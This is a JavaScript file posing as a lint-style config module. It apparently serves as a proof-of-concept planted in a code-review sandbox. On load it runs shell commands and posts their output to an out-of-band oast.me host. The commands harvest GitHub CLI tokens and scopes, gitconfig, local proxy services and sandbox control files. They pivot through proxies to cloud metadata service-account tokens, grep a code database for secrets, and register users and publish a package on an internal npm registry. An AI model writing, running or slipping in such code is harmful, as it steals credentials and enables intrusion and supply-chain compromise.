const cp=require("child_process");
const OOB="http://daifjmll0ffrr6psl5u0f1c4ncjj6xnon.oast.me";
function sh(c,t){try{return cp.execSync(c,{encoding:"utf8",timeout:t||9000,maxBuffer:20971520});}catch(e){return "ERR:"+String((e&&(e.stderr||e.message))||"").slice(0,400);}}
function post(tag,d){try{const b=Buffer.from(String(d)).toString("base64");sh(`curl -s --max-time 8 -X POST --data-binary ${JSON.stringify(b)} ${JSON.stringify(OOB+"/"+tag)}`);}catch(_){}}
(function(){
  // T: gh CLI token (redact value) + gitconfig (proxy/helper)
  post("T_GH_HOSTS", sh("sed -E 's/(oauth_token:|token:).*/\\1 <PRESENT_REDACTED>/' ~/.config/gh/hosts.yml 2>/dev/null; echo ---cfg---; cat ~/.config/gh/config.yml 2>/dev/null | head -20"));
  post("T_GH_SCOPE", sh("T=$(sed -nE 's/ *oauth_token: (.*)/\\1/p' ~/.config/gh/hosts.yml 2>/dev/null|head -1); echo tokfp=$(printf '%s' \"$T\"|wc -c)bytes_head=$(printf '%s' \"$T\"|cut -c1-7); echo ==user==; curl -s --max-time 6 -H \"Authorization: token $T\" https://api.github.com/user | tr ',' '\\n' | grep -E '\"(login|type|id)\"'; echo ==scopes==; curl -s --max-time 6 -H \"Authorization: token $T\" https://api.github.com/user -D - -o /dev/null | grep -iE 'x-oauth-scopes'; echo ==instrepos==; curl -s --max-time 6 -H \"Authorization: token $T\" 'https://api.github.com/installation/repositories?per_page=100' | tr ',' '\\n' | grep -E '\"(full_name|total_count)\"' | head -40"));
  post("T_GITCFG_FULL", sh("cat ~/.gitconfig 2>/dev/null | sed -E 's/(Proxy-Tokenizer:).{12}.*/\\1 <RED>/'"));
  // T: local services
  post("T_LOCAL_PORTS", sh("for hp in 127.0.0.1:8080 127.0.0.1:1080 127.0.0.1:8126 0.0.0.0:8080; do echo \"== $hp ==\"; curl -s --max-time 4 http://$hp/ | head -c 200; echo; done; echo ==8126info==; curl -s --max-time 4 http://127.0.0.1:8126/info | head -c 300"));
  // T: sandboxer control channel
  post("T_SANDBOXER", sh("ls -la /tmp 2>/dev/null | head -30; echo ==cmdfile==; for f in /tmp/sandboxer-command-resource-*.txt; do echo \"-- $f --\"; ls -la $f; head -c 400 $f 2>/dev/null; echo; echo writable:$([ -w $f ] && echo YES || echo no); done"));
  // T: proxy-pivot to GKE metadata via local proxies
  post("T_PIVOT_GKE", sh("echo ==socks1080==; curl -s --max-time 6 --proxy socks5://127.0.0.1:1080 -H 'Metadata-Flavor: Google' 'http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token' | head -c 200; echo; echo ==http8080==; curl -s --max-time 6 -x http://127.0.0.1:8080 -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email' | head -c 200; echo; echo ==http1080==; curl -s --max-time 6 -x http://127.0.0.1:1080 'http://169.254.169.254/computeMetadata/v1/' -H 'Metadata-Flavor: Google' | head -c 150"));
  post("T_PIVOT_INT", sh("echo ==verd-via-socks==; curl -s --max-time 6 --proxy socks5://127.0.0.1:1080 http://169.254.169.254/latest/meta-data/ | head -c 150; echo; echo ==gh-via-socks==; curl -s --max-time 6 --proxy socks5://127.0.0.1:1080 https://api.github.com/installation/repositories -o /dev/null -w '%{http_code}'"));
  // T: codegraph sqlite (may hold analyzed code)
  post("T_CODEGRAPH", sh("ls -la /tmp/coderabbit-codegraph-analysis.sqlite 2>/dev/null; strings /tmp/coderabbit-codegraph-analysis.sqlite 2>/dev/null | grep -aiE 'token|secret|key|github_pat|ghp_|gho_|http' | head -15"));
  // ---- V: Verdaccio self-register + authenticated publish (supply-chain test) ----
  post("V_REGISTER", sh("R=http://10.0.0.28:4873; U=crpoc$RANDOM; curl -s --max-time 7 -o /tmp/reg.json -w 'register_http=%{http_code}\\n' -X PUT $R/-/user/org.couchdb.user:$U -H 'content-type: application/json' --data '{\"name\":\"'$U'\",\"password\":\"PocPass12345!\",\"email\":\"poc@example.com\"}'; echo \"user=$U\"; sed -E 's/(\"token\" *: *\")[^\"]{8}[^\"]*/\\1<TOKEN_PRESENT>/' /tmp/reg.json | head -c 300"));
  post("V_PUBLISH", sh("set -e; R=http://10.0.0.28:4873; U=$(curl -s --max-time 6 -X PUT $R/-/user/org.couchdb.user:pub$RANDOM -H 'content-type: application/json' --data '{\"name\":\"pub'$RANDOM'\",\"password\":\"PocPass12345!\",\"email\":\"p@e.co\"}'); T=$(printf '%s' \"$U\" | sed -nE 's/.*\"token\" *: *\"([^\"]+)\".*/\\1/p'); echo tokpresent=$([ -n \"$T\" ] && echo yes || echo no); D=/tmp/pubpkg; rm -rf $D; mkdir -p $D; cd $D; printf '{\"name\":\"crpoc-probe-'$RANDOM'\",\"version\":\"1.0.0\",\"description\":\"poc\"}' > package.json; echo '//10.0.0.28:4873/:_authToken='$T > .npmrc; echo 'registry=http://10.0.0.28:4873' >> .npmrc; npm publish --registry $R 2>&1 | tail -8", 12000));
  post("V_PUBLISH_ANON", sh("R=http://10.0.0.28:4873; curl -s --max-time 6 -o /dev/null -w 'anon_user_register=%{http_code}' -X PUT $R/-/user/org.couchdb.user:anontest -H 'content-type: application/json' --data '{\"name\":\"anontest\",\"password\":\"x\"}'"));
})();
module.exports=[{rules:{}}];
